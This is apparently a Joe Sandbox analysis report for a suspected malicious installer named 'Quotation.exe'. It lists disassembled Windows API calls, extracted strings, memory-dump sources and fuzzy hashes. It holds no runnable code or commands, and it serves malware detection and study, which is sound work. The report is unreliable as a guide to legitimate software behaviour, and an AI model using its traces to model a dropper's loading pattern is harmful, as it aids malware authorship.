                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$C:\Users\user\ethnocentrism\skggene\Egyptians218$Call$X
                                                              • API String ID: 2624150263-3677112266
                                                              • Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                              • Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
                                                              • Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                              • Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D
                                                              APIs
                                                                • Part of subcall function 734212BB: GlobalAlloc.KERNELBASE(00000040,?,734212DB,?,7342137F,00000019,734211CA,-000000A0), ref: 734212C5
                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73421D2D
                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 73421D75
                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 73421D7F
                                                              • GlobalFree.KERNEL32(00000000), ref: 73421D92
                                                              • GlobalFree.KERNEL32(?), ref: 73421E74
                                                              • GlobalFree.KERNEL32(?), ref: 73421E79
                                                              • GlobalFree.KERNEL32(?), ref: 73421E7E
                                                              • GlobalFree.KERNEL32(00000000), ref: 73422068
                                                              • lstrcpyW.KERNEL32(?,?), ref: 73422222
                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 734222A1
                                                              • LoadLibraryW.KERNEL32(00000008), ref: 734222B2
                                                              • GetProcAddress.KERNEL32(?,?), ref: 7342230C
                                                              • lstrlenW.KERNEL32(00000808), ref: 73422326
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                              • String ID:
                                                              • API String ID: 245916457-0
                                                              • Opcode ID: a09f010f5a2a9a1f76da1b5a7607ba97bb59c7b9b77a9e23400a6a1a1e45f710
                                                              • Instruction ID: 35066b612c064709b00b6817da954e4dc7b04c15b6680cf6846ec6786cbfcf3f
                                                              • Opcode Fuzzy Hash: a09f010f5a2a9a1f76da1b5a7607ba97bb59c7b9b77a9e23400a6a1a1e45f710
                                                              • Instruction Fuzzy Hash: 73227A71D1420ADFDB59CFA4C9807EEBFB5FB08316F14452ED166B2280D7749A82CB58
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                              • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                              • DeleteObject.GDI32(00000000), ref: 00405007
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                              • ShowWindow.USER32(?,00000005), ref: 00405169
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                              • ImageList_Destroy.COMCTL32(?), ref: 00405337
                                                              • GlobalFree.KERNEL32(?), ref: 00405347
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                              • InvalidateRect.USER32(?,00000000,?), ref: 004054A3
                                                              • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                              • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                              • ShowWindow.USER32(00000000), ref: 00405503
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 2564846305-813528018
                                                              • Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                              • Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
                                                              • Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                              • Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 004046FD
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040472E
                                                              • GetSysColor.USER32(?), ref: 0040473F
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                              • lstrlenW.KERNEL32(?), ref: 00404760
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                              • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                              • SendMessageW.USER32(00000000), ref: 004047E2
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                              • SetCursor.USER32(00000000), ref: 00404861
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                              • SetCursor.USER32(00000000), ref: 0040487D
                                                              • SendMessageW.USER32(00000111,?,00000000), ref: 004048AC
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                              • String ID: Call$N$X
                                                              • API String ID: 3103080414-3886858328
                                                              • Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                              • Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
                                                              • Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                              • Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                              • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                              • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                              • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                              • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                                • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                              • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                              • wsprintfA.USER32 ref: 004061E6
                                                              • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                              • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                                • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406015
                                                                • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                              • String ID: %ls=%ls$[Rename]
                                                              • API String ID: 2171350718-461813615
                                                              • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                              • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                                                              • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                              • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Quotation.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                              • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                              • CharNextW.USER32(?,"C:\Users\user\Desktop\Quotation.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                              • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                              Strings
                                                              • "C:\Users\user\Desktop\Quotation.exe", xrefs: 00406813
                                                              • *?|<>/":, xrefs: 00406821
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004067D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-3250725203
                                                              • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                              • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                              • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                              • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                              • GetSysColor.USER32(00000000), ref: 00404562
                                                              • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                              • SetBkMode.GDI32(?,?), ref: 0040457A
                                                              • GetSysColor.USER32(?), ref: 0040458D
                                                              • SetBkColor.GDI32(?,?), ref: 0040459D
                                                              • DeleteObject.GDI32(?), ref: 004045B7
                                                              • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                              • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                              • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                              • GetMessagePos.USER32 ref: 00404E7E
                                                              • ScreenToClient.USER32(?,?), ref: 00404E98
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                              • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                              • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401E56
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                              • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID: Calibri
                                                              • API String ID: 3808545654-1409258342
                                                              • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                              • Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
                                                              • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                              • Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
                                                              APIs
                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                              • MulDiv.KERNEL32(000A7380,00000064,000A8750), ref: 00402FE1
                                                              • wsprintfW.USER32 ref: 00402FF1
                                                              • SetWindowTextW.USER32(?,?), ref: 00403001
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                              Strings
                                                              • verifying installer: %d%%, xrefs: 00402FEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: verifying installer: %d%%
                                                              • API String ID: 1451636040-82062127
                                                              • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                              • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                              • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                              • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                              APIs
                                                                • Part of subcall function 734212BB: GlobalAlloc.KERNELBASE(00000040,?,734212DB,?,7342137F,00000019,734211CA,-000000A0), ref: 734212C5
                                                              • GlobalFree.KERNEL32(?), ref: 73422743
